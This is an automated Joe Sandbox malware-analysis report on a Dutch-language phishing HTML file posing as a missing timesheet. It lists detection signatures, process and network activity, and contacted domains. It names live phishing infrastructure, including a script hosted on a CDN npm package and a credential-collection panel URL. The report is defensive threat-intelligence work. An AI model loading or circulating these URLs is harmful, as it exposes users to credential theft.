Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ontbrekende urenstaat.html

Overview

General Information

Sample name:Ontbrekende urenstaat.html
Analysis ID:1633764
MD5:71ec830c0e5360c37c5575e26e15c7c5
SHA1:f306ec8a0dae374d492df53e4550ad11e4719a10
SHA256:4b93fc3bcdcfa7321ba8a406bf9134ce67822cfc9372e57e3e7d6a24fbb9142e
Infos:

Detection

Score:52
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
HTML Script injector detected
Creates files inside the system directory
Deletes files inside the Windows folder
HTML page contains hidden javascript code
IP address seen in connection with other malware

Classification

  • System is w10x64
  • chrome.exe (PID: 6032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Ontbrekende urenstaat.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2236 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6592 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5568 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://noirlegacy-panel-1.website/api/uuurrlllAvira URL Cloud: Label: malware

Phishing

barindex
Source: file:///C:/Users/user/Desktop/Ontbrekende%20urenstaat.htmlHTTP Parser: New script, src: https://cdn.jsdelivr.net/npm/slowingdown4u@1.0.2/hard.js
Source: Ontbrekende urenstaat.htmlHTTP Parser: Base64 decoded: secure-codes
Source: Ontbrekende urenstaat.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Ontbrekende%20urenstaat.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Ontbrekende%20urenstaat.htmlHTTP Parser: No favicon
Source: https://sun-shine.pages.dev/#?refid=YkhKclFISnZZMnQzYjI5c0xtTnZiUT09JnBhcmFwYXJhJmE=HTTP Parser: No favicon
Source: Joe Sandbox ViewIP Address: 151.101.1.229 151.101.1.229
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.73.143
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.104.63
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.184.195
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /npm/slowingdown4u@1.0.2/hard.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: sun-shine.pages.devConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sun-shine.pages.devConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sun-shine.pages.dev/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: noirlegacy-panel-1.website
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: sun-shine.pages.dev
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Mon, 10 Mar 2025 14:05:43 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 91e35e5bfc547ae8-SJC
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Mon, 10 Mar 2025 14:05:44 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 91e35e5f5ec72510-SJC
Source: chromecache_56.1.drString found in binary or memory: https://noirlegacy-panel-1.website/api/uuurrlll
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6032_408991196Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6032_408991196Jump to behavior
Source: classification engineClassification label: mal52.phis.winHTML@23/9@10/5
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Packages\cr.sb.odm3E4D1A088C1F6D498C84F3C86DE73CE49F82A104Jump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Ontbrekende urenstaat.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2236 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5568 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2236 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --field-trial-handle=2212,i,4204881716747169675,11110953007057725676,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5568 /prefetch:8Jump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
11
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://noirlegacy-panel-1.website/api/uuurrlll100%Avira URL Cloudmalware
https://sun-shine.pages.dev/favicon.ico0%Avira URL Cloudsafe
file:///C:/Users/user/Desktop/Ontbrekende%20urenstaat.html0%Avira URL Cloudsafe
https://sun-shine.pages.dev/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.1.229
truefalse
    high
    noirlegacy-panel-1.website
    172.67.167.135
    truefalse
      high
      www.google.com
      142.250.184.196
      truefalse
        high
        sun-shine.pages.dev
        188.114.96.3
        truefalse
          unknown
          cdn.jsdelivr.net
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://sun-shine.pages.dev/#?refid=YkhKclFISnZZMnQzYjI5c0xtTnZiUT09JnBhcmFwYXJhJmE=false
              unknown
              https://sun-shine.pages.dev/false
              • Avira URL Cloud: safe
              unknown
              https://sun-shine.pages.dev/favicon.icofalse
              • Avira URL Cloud: safe
              unknown
              file:///C:/Users/user/Desktop/Ontbrekende%20urenstaat.htmltrue
              • Avira URL Cloud: safe
              unknown
              https://cdn.jsdelivr.net/npm/slowingdown4u@1.0.2/hard.jsfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://noirlegacy-panel-1.website/api/uuurrlllchromecache_56.1.drfalse
                • Avira URL Cloud: malware
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                151.101.1.229
                jsdelivr.map.fastly.netUnited States
                54113FASTLYUSfalse
                142.250.184.196
                www.google.comUnited States
                15169GOOGLEUSfalse
                172.67.167.135
                noirlegacy-panel-1.websiteUnited States
                13335CLOUDFLARENETUSfalse
                188.114.96.3
                sun-shine.pages.devEuropean Union
                13335CLOUDFLARENETUSfalse
                IP
                192.168.2.9
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1633764
                Start date and time:2025-03-10 15:04:28 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 24s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowshtmlcookbook.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:16
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Ontbrekende urenstaat.html
                Detection:MAL
                Classification:mal52.phis.winHTML@23/9@10/5
                Cookbook Comments:
                • Found application associated with file extension: .html
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 142.250.185.142, 142.250.185.67, 142.250.185.78, 66.102.1.84, 142.250.186.110, 142.250.185.110, 142.250.186.174, 142.250.185.206, 216.58.206.74, 142.250.181.234, 216.58.212.170, 142.250.185.234, 142.250.185.138, 142.250.186.106, 142.250.185.106, 142.250.186.74, 172.217.18.10, 172.217.16.202, 142.250.185.74, 216.58.206.42, 142.250.186.138, 142.250.185.170, 142.250.186.42, 142.250.185.202, 199.232.214.172, 142.250.186.142, 142.250.185.174, 142.250.184.238, 216.58.206.78, 216.58.212.142, 142.250.185.195, 142.250.184.206, 216.58.206.35, 142.250.186.78, 172.217.16.206, 142.250.185.238, 4.175.87.197, 23.199.214.10
                • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog, optimizationguide-pa.googleapis.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenFile calls found.
                No simulations
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                151.101.1.229http://www.ledger-secure03948.sssgva.com/Get hashmaliciousUnknownBrowse
                • cdn.jsdelivr.net/jquery.magnific-popup/1.0.0/jquery.magnific-popup.min.js
                188.114.96.33tEL1ZRXA6.exeGet hashmaliciousFormBookBrowse
                • www.marposet.shop/6ixs/?Ar6T=oN0T/Esi7H2jJ4TMjw8b93BQPnEdNzyQiBUPeT1k8Z/eibB9ghV+qpvP7NsuhjacLnuX6HraU4xmdMUu2umYnCC8s1rtYFvj99qSyPPCwvQggIKSHQ==&Lfpd=o6ndcl
                2rvyZc27tz.exeGet hashmaliciousFormBookBrowse
                • www.timeinsardinia.info/50g8/
                INVOICE 4562.exeGet hashmaliciousFormBookBrowse
                • www.timeinsardinia.info/jjft/
                Payment-031025-pdf.exeGet hashmaliciousFormBookBrowse
                • www.ezjytrkuqlw.info/zsr7/
                F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeGet hashmaliciousFormBookBrowse
                • www.tgwfj.xyz/b5fo/
                yloe82Jp1k.exeGet hashmaliciousFormBookBrowse
                • www.comebackhome.online/dv29/
                6KzB3ReZ6z.exeGet hashmaliciousFormBookBrowse
                • www.clzt.shop/j1w0/
                3JZ4CUFqSs.exeGet hashmaliciousFormBookBrowse
                • www.actpisalnplay.cyou/oxsm/
                g1V10ssekg.exeGet hashmaliciousFormBookBrowse
                • www.comebackhome.online/dv29/?UPV=lyDuWv8anyDzCsrsL6PTwCreB/WdAINc3G6wsV0rNYv9zNmSH7KTJBB1K2WfFvHvPOh/z5cHktk3l1356pnt1M3PZl4mowifUTZkIWOf1ffB0d/Fsg==&YrV=FlsDgRMx
                thUKanu6GD.lnkGet hashmaliciousHTMLPhisher, MalLnkBrowse
                • 559236.na3.to/gift/setup4391.msi
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                jsdelivr.map.fastly.nethttps://publizr.com/alliedcon/allied-constructionGet hashmaliciousGabagoolBrowse
                • 151.101.1.229
                https://publizr.com/alliedcon/allied-constructionGet hashmaliciousGabagoolBrowse
                • 151.101.193.229
                http://47musk.comGet hashmaliciousUnknownBrowse
                • 151.101.65.229
                https://linktr.ee/leena_PaulGet hashmaliciousUnknownBrowse
                • 151.101.65.229
                http://signaturerequestdocumentsmarch.sombrainfinita.de/uN7hnGet hashmaliciousUnknownBrowse
                • 151.101.129.229
                Play_Voicemail_Transcription._(387.KB).svgGet hashmaliciousHTMLPhisherBrowse
                • 151.101.193.229
                https://addsolutions.biz/accounting/heavyduty/heavydutymfg.htmlGet hashmaliciousUnknownBrowse
                • 151.101.1.229
                https://demanddistribution.comGet hashmaliciousUnknownBrowse
                • 151.101.1.229
                https://securefile395.outgrow.us/securefile395-9Get hashmaliciousHTMLPhisherBrowse
                • 151.101.193.229
                https://duro-dakovic.valbeeek-law.com/Get hashmaliciousHTMLPhisherBrowse
                • 151.101.129.229
                sun-shine.pages.devproposal request.html.htmlGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                noirlegacy-panel-1.websiteproposal request.html.htmlGet hashmaliciousHTMLPhisherBrowse
                • 104.21.82.11
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSEmma Sparkes_cmrdpkuyjxetud.htmlGet hashmaliciousHTMLPhisherBrowse
                • 162.159.140.229
                https://publizr.com/alliedcon/allied-constructionGet hashmaliciousGabagoolBrowse
                • 172.67.143.150
                sNtelKBdvr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 104.21.64.1
                rgk62zzDVd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 104.21.96.1
                https://publizr.com/alliedcon/allied-constructionGet hashmaliciousGabagoolBrowse
                • 172.67.74.152
                ESrG8c98zz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 104.21.64.1
                ZS0Uo8zwGk.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 104.21.16.1
                B599ZYjsg4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 104.21.112.1
                unL24EiP4J.exeGet hashmaliciousFormBookBrowse
                • 188.114.96.3
                LdksctiMff.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 104.21.112.1
                CLOUDFLARENETUSEmma Sparkes_cmrdpkuyjxetud.htmlGet hashmaliciousHTMLPhisherBrowse
                • 162.159.140.229
                https://publizr.com/alliedcon/allied-constructionGet hashmaliciousGabagoolBrowse
                • 172.67.143.150
                sNtelKBdvr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 104.21.64.1
                rgk62zzDVd.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 104.21.96.1
                https://publizr.com/alliedcon/allied-constructionGet hashmaliciousGabagoolBrowse
                • 172.67.74.152
                ESrG8c98zz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 104.21.64.1
                ZS0Uo8zwGk.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 104.21.16.1
                B599ZYjsg4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 104.21.112.1
                unL24EiP4J.exeGet hashmaliciousFormBookBrowse
                • 188.114.96.3
                LdksctiMff.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 104.21.112.1
                FASTLYUShttps://publizr.com/alliedcon/allied-constructionGet hashmaliciousGabagoolBrowse
                • 151.101.1.229
                https://publizr.com/alliedcon/allied-constructionGet hashmaliciousGabagoolBrowse
                • 151.101.2.137
                https://github.com/fenwikk/rickroll/raw/main/roll.p1Get hashmaliciousUnknownBrowse
                • 185.199.109.133
                RECHNUNG_Lieferschein_001927.htmGet hashmaliciousUnknownBrowse
                • 151.101.194.137
                http://raretoonsindia.coGet hashmaliciousUnknownBrowse
                • 199.232.192.193
                https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#jake.totam@southwark.anglican.orgGet hashmaliciousHTMLPhisherBrowse
                • 151.101.130.137
                https://kwikkopyegypt.com/wp-admin/mail.verify/interface.root/login.php/inbox.html#luke.tatam@southwark.anglican.orgGet hashmaliciousHTMLPhisherBrowse
                • 151.101.130.137
                m5Pok55RGl.exeGet hashmaliciousUnknownBrowse
                • 185.199.108.153
                https://railrent.pexrayitech.com/Get hashmaliciousHTMLPhisherBrowse
                • 151.101.2.137
                https://cdn-facxxx.b-cdn.net/Get hashmaliciousUnknownBrowse
                • 104.244.43.131
                No context
                No context
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:HTML document, ASCII text, with CRLF line terminators
                Category:downloaded
                Size (bytes):553
                Entropy (8bit):4.662821081936326
                Encrypted:false
                SSDEEP:12:TvgsoCVIogs01lI55aNGlTF5TF5TF5TF5TF5TFK:cEQtnstTPTPTPTPTPTc
                MD5:0127426BF3BA07FF7211399DDF5186C4
                SHA1:221D89F3261F545AC58848EBA300E0134C76FF9A
                SHA-256:982B986BB578E137F062099427A8CAEC3C501C84A9E4B22369EBD2BADEC42FE7
                SHA-512:6CEA4AB7D43A518A316120BF7AE340583E989A21FC3E142DDD71742D53A7AE6CFA276F232ACD6B6794444B28AA9A666C40171EE44341A7B9A3CA8453B61A371A
                Malicious:false
                Reputation:moderate, very likely benign file
                URL:https://sun-shine.pages.dev/
                Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>cloudflare</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:HTML document, ASCII text, with CRLF line terminators
                Category:downloaded
                Size (bytes):553
                Entropy (8bit):4.662821081936326
                Encrypted:false
                SSDEEP:12:TvgsoCVIogs01lI55aNGlTF5TF5TF5TF5TF5TFK:cEQtnstTPTPTPTPTPTc
                MD5:0127426BF3BA07FF7211399DDF5186C4
